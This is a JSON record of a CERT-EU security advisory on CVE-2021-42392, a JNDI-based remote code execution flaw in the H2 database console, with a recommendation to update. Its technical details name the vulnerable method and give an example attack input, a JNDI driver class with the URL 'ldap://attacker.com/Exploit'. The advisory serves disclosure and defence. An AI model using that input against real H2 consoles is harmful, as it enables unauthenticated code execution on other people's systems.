{
    "file_item": {
        "filepath": "security-advisories",
        "filename": "CERT-EU-SA2022-002.pdf"
    },
    "title": "Critical RCE Vulnerability in H2 Database Console",
    "serial_number": "2022-002",
    "publish_date": "07-01-2022 17:35:00",
    "description": "On the 6th of January 2022, security researchers from JFrog identified a critical JNDI-based vulnerability in the H2 database console that exploits the same root cause as the Log4Shell vulnerability. Identified by CVE-2021-42392, this security flaw could lead to unauthenticated remote code execution.<br>H2 is an open-source relational database management system written in Java that can be embedded within applications or run in a client-server mode.",
    "url_title": "2022-002",
    "content_markdown": "---\ntitle: 'Critical RCE Vulnerability in\u00a0H2\u00a0Database\u00a0Console'\nversion: '1.0'\nnumber: '2022-002'\ndate: 'January 7, 2022'\n---\n\n_History:_\n\n* _07/01/2022 --- v1.0 -- Initial publication_\n\n# Summary\n\nOn the 6th of January 2022, security researchers from JFrog identified a critical JNDI-based vulnerability in the H2 database console that exploits the same root cause as the Log4Shell vulnerability [1]. Identified by **CVE-2021-42392**, this security flaw could lead to unauthenticated remote code execution.\n\nH2 is an open-source relational database management system written in Java that can be embedded within applications or run in a client-server mode.\n\n# Technical Details\n\nAs with Log4Shell, this vulnerability is due to several code paths in the H2 database framework that pass unfiltered attacker-controlled URLs to the `javax.naming.Context.lookup` function, which allows for remote code execution.\n\nSpecifically, the `org.h2.util.JdbcUtils.getConnection` method takes a driver class name and database URL as parameters. If the driver\u2019s class is assignable to `javax.naming.Context`, supplying a driver class such as `javax.naming.InitialContext` and a URL such as `ldap://attacker.com/Exploit` will lead to remote code execution.\n\n# Affected products\n\nThe vulnerability affects H2 database versions 1.1.100 to 2.0.204.\n\n# Recommendations\n\nIt is recommended to update H2 database to version 2.0.206, released on January 5, 2022 [2].\n\n# References\n\n[1] <https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/>\n\n[2] <https://github.com/h2database/h2database/releases/tag/version-2.0.206>\n",
    "content_html": "<p><em>History:</em></p><ul><li><em>07/01/2022 --- v1.0 -- Initial publication</em></li></ul><h2 id=\"summary\">Summary</h2><p>On the 6th of January 2022, security researchers from JFrog identified a critical JNDI-based vulnerability in the H2 database console that exploits the same root cause as the Log4Shell vulnerability [1]. Identified by <strong>CVE-2021-42392</strong>, this security flaw could lead to unauthenticated remote code execution.</p><p>H2 is an open-source relational database management system written in Java that can be embedded within applications or run in a client-server mode.</p><h2 id=\"technical-details\">Technical Details</h2><p>As with Log4Shell, this vulnerability is due to several code paths in the H2 database framework that pass unfiltered attacker-controlled URLs to the <code>javax.naming.Context.lookup</code> function, which allows for remote code execution.</p><p>Specifically, the <code>org.h2.util.JdbcUtils.getConnection</code> method takes a driver class name and database URL as parameters. If the driver\u2019s class is assignable to <code>javax.naming.Context</code>, supplying a driver class such as <code>javax.naming.InitialContext</code> and a URL such as <code>ldap://attacker.com/Exploit</code> will lead to remote code execution.</p><h2 id=\"affected-products\">Affected products</h2><p>The vulnerability affects H2 database versions 1.1.100 to 2.0.204.</p><h2 id=\"recommendations\">Recommendations</h2><p>It is recommended to update H2 database to version 2.0.206, released on January 5, 2022 [2].</p><h2 id=\"references\">References</h2><p>[1] <a rel=\"noopener\" target=\"_blank\" href=\"https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/\">https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/</a></p><p>[2] <a rel=\"noopener\" target=\"_blank\" href=\"https://github.com/h2database/h2database/releases/tag/version-2.0.206\">https://github.com/h2database/h2database/releases/tag/version-2.0.206</a></p>",
    "licence": {
        "title": "Creative Commons Attribution 4.0 International (CC-BY 4.0)",
        "link": "https://creativecommons.org/licenses/by/4.0/",
        "restrictions": "https://cert.europa.eu/legal-notice",
        "author": "The Cybersecurity Service for the Union institutions, bodies, offices and agencies"
    }
}